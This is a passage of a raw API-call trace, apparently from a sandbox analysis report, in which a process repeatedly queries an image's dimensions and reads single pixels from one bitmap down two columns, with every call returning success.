(image=0x57afcf0, height=0x4de210) returned 0x0 [0174.739] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=216, color=0x4de220) returned 0x0 [0174.739] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.739] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.739] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=217, color=0x4de220) returned 0x0 [0174.739] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.739] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.739] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=218, color=0x4de220) returned 0x0 [0174.739] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.739] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.739] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=219, color=0x4de220) returned 0x0 [0174.739] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.739] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.739] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=220, color=0x4de220) returned 0x0 [0174.739] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.739] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.739] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=221, color=0x4de220) returned 0x0 [0174.739] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.740] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.740] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=222, color=0x4de220) returned 0x0 [0174.740] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.740] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.740] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=223, color=0x4de220) returned 0x0 [0174.740] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.740] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.740] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=224, color=0x4de220) returned 0x0 [0174.740] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.740] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.740] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=225, color=0x4de220) returned 0x0 [0174.740] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.740] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.740] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=226, color=0x4de220) returned 0x0 [0174.740] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.740] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.740] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=227, color=0x4de220) returned 0x0 [0174.740] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.740] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.740] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=228, color=0x4de220) returned 0x0 [0174.740] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.740] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.740] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=229, color=0x4de220) returned 0x0 [0174.740] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.740] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.740] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=230, color=0x4de220) returned 0x0 [0174.740] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.741] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.741] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=231, color=0x4de220) returned 0x0 [0174.741] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.741] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.741] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=232, color=0x4de220) returned 0x0 [0174.741] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.741] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.741] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=233, color=0x4de220) returned 0x0 [0174.741] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.741] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.741] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=234, color=0x4de220) returned 0x0 [0174.741] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.741] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.741] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=235, color=0x4de220) returned 0x0 [0174.741] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.741] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.741] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=236, color=0x4de220) returned 0x0 [0174.741] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.741] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.741] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=237, color=0x4de220) returned 0x0 [0174.741] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.741] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.741] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=238, color=0x4de220) returned 0x0 [0174.741] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.741] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.742] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=239, color=0x4de220) returned 0x0 [0174.742] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.742] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.742] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=240, color=0x4de220) returned 0x0 [0174.742] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.742] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.742] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=241, color=0x4de220) returned 0x0 [0174.742] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.742] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.742] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=242, color=0x4de220) returned 0x0 [0174.742] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.742] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.742] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=243, color=0x4de220) returned 0x0 [0174.742] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.742] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.742] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=244, color=0x4de220) returned 0x0 [0174.742] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.742] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.742] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=245, color=0x4de220) returned 0x0 [0174.742] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.742] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.742] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=246, color=0x4de220) returned 0x0 [0174.742] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.742] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.743] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=247, color=0x4de220) returned 0x0 [0174.743] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.743] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.743] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=248, color=0x4de220) returned 0x0 [0174.743] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.743] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.743] GdipBitmapGetPixel (bitmap=0x57afcf0, x=0, y=249, color=0x4de220) returned 0x0 [0174.785] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.785] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.785] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=168, color=0x4de220) returned 0x0 [0174.785] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.785] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.785] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=169, color=0x4de220) returned 0x0 [0174.785] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.785] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.786] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=170, color=0x4de220) returned 0x0 [0174.786] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.786] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.786] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=171, color=0x4de220) returned 0x0 [0174.786] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.786] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.786] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=172, color=0x4de220) returned 0x0 [0174.786] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.786] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.786] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=173, color=0x4de220) returned 0x0 [0174.786] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.786] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.786] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=174, color=0x4de220) returned 0x0 [0174.787] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.787] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.787] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=175, color=0x4de220) returned 0x0 [0174.787] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.787] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.787] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=176, color=0x4de220) returned 0x0 [0174.787] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.787] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.787] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=177, color=0x4de220) returned 0x0 [0174.787] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.787] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.787] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=178, color=0x4de220) returned 0x0 [0174.787] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.787] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.788] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=179, color=0x4de220) returned 0x0 [0174.788] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.788] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.788] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=180, color=0x4de220) returned 0x0 [0174.789] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.789] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.789] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=181, color=0x4de220) returned 0x0 [0174.789] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.789] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.789] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=182, color=0x4de220) returned 0x0 [0174.789] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.789] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.789] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=183, color=0x4de220) returned 0x0 [0174.789] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.789] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.789] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=184, color=0x4de220) returned 0x0 [0174.789] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.789] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.789] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=185, color=0x4de220) returned 0x0 [0174.789] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.789] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.790] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=186, color=0x4de220) returned 0x0 [0174.790] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.790] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.790] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=187, color=0x4de220) returned 0x0 [0174.790] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.790] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.790] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=188, color=0x4de220) returned 0x0 [0174.790] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.790] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.790] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=189, color=0x4de220) returned 0x0 [0174.790] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.790] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.790] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=190, color=0x4de220) returned 0x0 [0174.790] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.791] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.791] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=191, color=0x4de220) returned 0x0 [0174.791] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.791] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.791] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=192, color=0x4de220) returned 0x0 [0174.791] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.791] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.791] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=193, color=0x4de220) returned 0x0 [0174.791] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.791] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.791] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=194, color=0x4de220) returned 0x0 [0174.791] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.791] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.791] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=195, color=0x4de220) returned 0x0 [0174.791] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.791] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.791] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=196, color=0x4de220) returned 0x0 [0174.792] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.792] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.792] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=197, color=0x4de220) returned 0x0 [0174.792] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.792] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.792] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=198, color=0x4de220) returned 0x0 [0174.792] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.793] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.793] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=199, color=0x4de220) returned 0x0 [0174.793] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.793] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.793] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=200, color=0x4de220) returned 0x0 [0174.793] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.793] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.793] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=201, color=0x4de220) returned 0x0 [0174.793] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.793] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.793] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=202, color=0x4de220) returned 0x0 [0174.793] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.793] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.793] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=203, color=0x4de220) returned 0x0 [0174.793] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.793] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.793] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=204, color=0x4de220) returned 0x0 [0174.793] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.793] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.794] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=205, color=0x4de220) returned 0x0 [0174.794] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.794] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.794] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=206, color=0x4de220) returned 0x0 [0174.794] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.794] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.794] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=207, color=0x4de220) returned 0x0 [0174.794] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.794] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.794] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=208, color=0x4de220) returned 0x0 [0174.794] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.794] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.794] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=209, color=0x4de220) returned 0x0 [0174.794] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.794] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.794] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=210, color=0x4de220) returned 0x0 [0174.794] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.795] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.795] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=211, color=0x4de220) returned 0x0 [0174.795] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.795] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.795] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=212, color=0x4de220) returned 0x0 [0174.795] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.795] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.795] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=213, color=0x4de220) returned 0x0 [0174.795] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.795] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.795] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=214, color=0x4de220) returned 0x0 [0174.795] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.795] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.795] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=215, color=0x4de220) returned 0x0 [0174.795] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.795] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.795] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=216, color=0x4de220) returned 0x0 [0174.795] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.795] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.796] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=217, color=0x4de220) returned 0x0 [0174.796] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.796] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.796] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=218, color=0x4de220) returned 0x0 [0174.796] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.796] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.796] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=219, color=0x4de220) returned 0x0 [0174.796] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.796] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.796] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=220, color=0x4de220) returned 0x0 [0174.796] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.796] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.796] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=221, color=0x4de220) returned 0x0 [0174.796] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.796] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.796] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=222, color=0x4de220) returned 0x0 [0174.796] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.796] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.797] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=223, color=0x4de220) returned 0x0 [0174.797] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.797] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.797] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=224, color=0x4de220) returned 0x0 [0174.797] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.797] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.797] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=225, color=0x4de220) returned 0x0 [0174.797] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.797] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.797] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=226, color=0x4de220) returned 0x0 [0174.797] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.797] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.797] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=227, color=0x4de220) returned 0x0 [0174.797] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.797] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.797] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=228, color=0x4de220) returned 0x0 [0174.797] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.797] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.798] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=229, color=0x4de220) returned 0x0 [0174.798] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.798] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.798] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=230, color=0x4de220) returned 0x0 [0174.798] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.798] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.798] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=231, color=0x4de220) returned 0x0 [0174.798] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.798] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.798] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=232, color=0x4de220) returned 0x0 [0174.798] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.805] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.805] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=233, color=0x4de220) returned 0x0 [0174.805] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.805] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.805] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=234, color=0x4de220) returned 0x0 [0174.805] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.805] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.805] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=235, color=0x4de220) returned 0x0 [0174.805] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.805] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.805] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=236, color=0x4de220) returned 0x0 [0174.806] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.806] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.806] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=237, color=0x4de220) returned 0x0 [0174.806] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.806] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.806] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=238, color=0x4de220) returned 0x0 [0174.806] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.806] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.806] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=239, color=0x4de220) returned 0x0 [0174.806] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.806] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.806] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=240, color=0x4de220) returned 0x0 [0174.806] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.806] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.806] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=241, color=0x4de220) returned 0x0 [0174.806] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 